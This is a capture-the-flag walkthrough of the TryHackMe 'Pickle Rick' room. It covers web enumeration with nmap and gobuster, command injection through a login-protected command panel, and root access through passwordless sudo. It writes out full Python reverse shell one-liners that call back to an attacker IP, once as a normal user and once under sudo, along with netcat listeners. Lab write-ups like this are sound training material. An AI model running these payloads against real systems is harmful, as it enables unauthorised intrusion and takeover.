Pickle Rick — TryHackMe Walkthrough
Hi! Today we are solving Pickle Rick on TryHackMe, which is an easy-rated room based around the theme of the TV show Rick and Morty. To crack this room we’ll exploit the command injection vulnerability found on the web server.
Room Link: https://tryhackme.com/room/picklerick
Lets get started!
Let us first add our target ip to /etc/hosts
:
Step 0: Reconnaissance
We must discover the open ports on our target’s machine. For this task I’ll use Nmap(network mapper) which is a popular tool used by pentesters for target enumeration.
sudo nmap -sC -sV -oN logs/initial_nmap rick.thm
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief
- 22/tcp — SSH(Secure Shell) — used for secure remote access to systems, we must find a username and password of ssh to get access of the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.18 web server.
Step 1: Exploring web server
Let us visit the website running on port 80(HTTP protocol) and check for important information.
On the surface, it looks like a normal web page. Lets inspect the source code for any clues.
There’s a comment that gives us a username(R1ckRul3s) which can be used to log into the ssh server or somewhere else. Now let’s check the robots.txt
file if it gives us any directories.
Weird! Its some random gibberish, its not even a directory.
We haven’t got anything juicy as of now. Let us now enumerate the web server to get all the existing directories/files on it. We’ll use gobuster
for this task — gobuster is a software tool for brute forcing directories/files on web servers.
gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
No luck! Lets run it again but now with a different wordlist and also check for .php
and .html
extensions.
gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html
Discovered what seems to be like a login page and a portal which requires authentication through the login page.
Lets use the username from the source code and gibberish from the robots.txt
file to log in.
And we discovered a command panel. Looks like we can do some command injection to compromise this machine.
Tried a path traversal with cat ../../../etc/passwd
but the cat command is disabled:
Lets try with less
command.
And the command injection works!
Step 2: Compromising the system
Lets start a netcat
listener on our attack machine and get a shell through command injection. Here’s how to do it:
On attack machine:
nc -nl8vp 9001
On command panel:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bingo! we’re in…
But before moving forward let us stabilize the shell:
Now we have a fully interactive shell.
Lets grab the first ingredient(flag):
Lets check what clue we have:
Gotta navigate around the file system now!
In the home directory we find 2 users — Ubuntu and Rick.
Inside Rick’s file system, we get the second ingredient.
Step 3: Privilege Escalation
Lets check what commands can our current user execute as root
user using the sudo -l
command:
We can execute all the commands with sudo without the need of a password. Thats a crazy blunder! Such misconfigurations make the system easy to be exploited.
Lets abuse this by spawning another reverse shell on our machine but this time we’ll send the request to our listener with root privileges:
On attack machine
nc -nlvp 4444
On target machine
sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
On the netcat listener we get our privileged shell after executing the reverse shell code:
pwned!!!
We got all the three ingredients, Lets hope that Rick now turns back to human.
Conclusion
Pickle Rick is a fun thematic room which requires knowledge of web exploitation and privilege escalation. Despite this being an easy-rated room, some may find it a bit difficult, I personally struggled with the web enumeration part where I was supposed to discover the command panel which was vulnerable to command injection attack.
References
Happy Hacking!